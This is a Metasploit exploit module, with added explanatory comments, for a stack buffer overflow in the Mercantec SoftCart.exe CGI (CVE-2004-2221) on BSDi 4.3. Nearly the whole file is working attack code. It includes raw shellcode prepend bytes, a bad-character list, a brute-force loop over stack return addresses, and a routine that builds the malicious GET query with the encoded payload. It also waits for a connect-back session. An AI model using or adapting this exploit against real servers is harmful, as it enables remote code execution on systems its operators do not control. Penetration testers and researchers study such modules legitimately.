##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Brute
  include Msf::Exploit::Remote::HttpClient

  # Stack overflow in the Mercantec SoftCart.exe CGI (CVE-2004-2221), reached
  # through a single malformed GET query string. The return address is not
  # known in advance, so the Brute mixin walks the 'Ret' range below and calls
  # brute_exploit once per candidate.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mercantec SoftCart CGI Overflow',
        'Description' => %q{
          This is an exploit for an undisclosed buffer overflow
          in the SoftCart.exe CGI as shipped with Mercantec's shopping
          cart software. It is possible to execute arbitrary code
          by passing a malformed CGI parameter in an HTTP GET
          request. This issue is known to affect SoftCart version
          4.00b.
        },
        'Author' => [ 'skape', 'trew' ],
        'References' => [
          [ 'CVE', '2004-2221'],
          [ 'OSVDB', '9011'],
          [ 'BID', '10926'],
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000,
          # The payload travels inside a URL query string, so whitespace,
          # shell metacharacters, quoting/bracket characters and NUL are all
          # excluded rather than relying on the CGI to decode them cleanly.
          'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b\x7d\x28\x29\x3f\x5d\x5b\x00",
          'MinNops' => 16,
          # NOTE(review): the prepend bytes look like a BSD fork()/exit() stub
          # issued via lcall 7:0 (syscalls 2 and 1), so the shellcode proper
          # runs in a child while the original process exits -- confirm by
          # disassembling before relying on that reading.
          'Prepend' => "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00\x00\x07\x00",
          # sub esp, 0x7f before the decoder runs; presumably keeps the decoder's
          # own stack use from overwriting the encoded payload it is decoding.
          'PrependEncoder' => "\x83\xec\x7f"
        },
        'Platform' => 'bsdi',
        'Targets' => [
          [
            'BSDi/4.3 Bruteforce',
            {
              'Bruteforce' =>
              {
                # Candidate stack addresses tried in turn. 'Step' => 0 hands
                # the step size to the Brute mixin's default (presumably derived
                # from the payload/NOP sled) -- check Msf::Exploit::Brute.
                'Start' => { 'Ret' => 0xefbf3000 },
                'Stop' => { 'Ret' => 0xefbffffc },
                'Step' => 0
              }
            },
          ],
        ],
        'DisclosureDate' => '2004-08-19',
        'DefaultTarget' => 0,
        # Each wrong guess crashes the CGI process (which the web server simply
        # re-spawns on the next request), and every attempt is a GET whose
        # query string carries the payload, so the brute force is noisy in
        # access logs.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [ false, 'The target CGI URI', '/cgi-bin/SoftCart.exe' ])
      ]
    )
  end

  # Brute mixin callback: one attempt per candidate return address.
  #
  # @param address [Hash] current brute-force position; only 'Ret' is used.
  #
  # The first call fingerprints the target (see confirm_mercantec_target!) and
  # aborts the whole run if it does not look like a Mercantec CGI. Note the
  # fingerprint is only a copyright match -- it does not verify the 4.00b
  # version named in the description, so unaffected Mercantec versions are
  # still brute-forced.
  def brute_exploit(address)
    confirm_mercantec_target! unless @mercantec

    ret = address['Ret']

    print_status("Trying #{'%.8x' % ret}...")
    send_request_raw({
      'uri' => normalize_uri(datastore['URI']),
      'query' => overflow_query(ret)
    }, 5)

    # Give a connect-back payload a chance to check in before the next guess.
    handler
  end

  private

  # Fetches the CGI once and remembers (in @mercantec) whether its body carries
  # the Mercantec copyright string. Raises via fail_with(Failure::NotFound)
  # when it does not, which stops the brute-force loop.
  def confirm_mercantec_target!
    res = send_request_raw({
      'uri' => normalize_uri(datastore['URI'])
    }, 5)
    @mercantec = res && res.body && res.body =~ /Copyright.*Mercantec/
    fail_with(Failure::NotFound, 'The target is not a Mercantec CGI') unless @mercantec
  end

  # Builds the malformed query string for one return-address guess.
  #
  # Layout: fixed 'MAA+scstoreB' prefix, 512 bytes of alphanumeric filler,
  # the guessed return address, a 4-byte 'MSF!' marker, a second pointer at
  # ret + payload length, then the encoded payload. All pointers are
  # little-endian 32-bit ('V'). The exact frame the two pointers land in is
  # not visible from this module -- presumably the vulnerable CGI consumes
  # both; treat the comment as a description of the bytes, not of the bug.
  #
  # @param ret [Integer] candidate return address
  # @return [String] raw query string (binary-safe, no URL encoding applied)
  def overflow_query(ret)
    shellcode = payload.encoded
    [
      'MAA+scstoreB',
      rand_text_alphanumeric(512),
      [ret].pack('V'),
      'MSF!',
      [ret + shellcode.length].pack('V'),
      shellcode
    ].join
  end
end